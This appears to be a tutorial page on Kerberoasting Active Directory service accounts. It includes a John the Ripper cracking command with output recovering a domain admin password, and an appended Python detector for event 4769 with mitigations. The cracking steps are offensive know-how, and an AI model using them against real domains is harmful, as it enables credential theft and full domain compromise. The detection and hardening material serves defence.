This page deals with compromising Active Directory with the Kerberoast attack.
Introduction
For several reasons, it is very common in Active Directory environments to find services that run under domain administrator accounts. A Service Principal Name (SPN) associates a service with the user account that launched it.
Any domain user is allowed to request a service ticket for such an SPN. Because that ticket is encrypted with a key derived from the service account's password, it can be cracked offline to retrieve the cleartext password of the domain administrator who launched the service.
If the attack is successful, the attacker compromises the Active Directory domain.
uberuser belongs to the Domain Admins group (cf. MemberOf column).
Crack Tickets
First, install the MagnumRipper version of John The Ripper, which supports the KRB5TGS format.
Then crack the tickets to obtain the cleartext passwords:
root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123 ($krb5tgs$unkown)
ASDqwe123 ($krb5tgs$unkown)
It is an efficient way to compromise a domain admin password and, consequently, the Active Directory domain.
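On the defender's side, the attack leaves a recognisable trace in Windows Security event 4769 (Kerberos service ticket request): one account requesting RC4 tickets (TicketEncryptionType 0x17, the same etype the john output above cracks) for several service accounts within a short window. The following detector is an added example, not code from the original page; the event records are constructed, the field names follow the 4769 event schema, and the threshold and window are assumptions to tune per environment.

```python
# Heuristic Kerberoasting detector over Windows Security event 4769 records.
# A Kerberoast run requests service tickets for many service accounts in a
# short burst, usually with RC4 (TicketEncryptionType 0x17). Field names
# follow the 4769 schema; the sample records below are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"

# Constructed sample: 'jdoe' bursts across several service accounts with RC4
# in two seconds; 'alice' makes one RC4 request and one AES (0x12) request.
SAMPLE_4769 = [
    {"time": "2024-01-01T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "uberuser", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"time": "2024-01-01T10:01:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
    {"time": "2024-01-01T10:09:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
]

def find_kerberoast_candidates(events, min_accounts=3, window=timedelta(minutes=5)):
    """Map each requesting user to the sorted service accounts it asked RC4
    tickets for, when at least min_accounts distinct ones fall inside window."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() != RC4_ETYPE:
            continue
        svc = ev["ServiceName"]
        # Computer accounts ('NAME$') and krbtgt have random passwords: noise only.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[ev["TargetUserName"]].append((datetime.fromisoformat(ev["time"]), svc))

    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window from each request
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= min_accounts:
                hits[user] = sorted(seen)
                break
    return hits
```

Pair the alert with the mitigations that remove the precondition: long random passwords for service accounts (or group Managed Service Accounts), no SPNs on Domain Admins members, and AES-only Kerberos encryption so RC4 requests stand out.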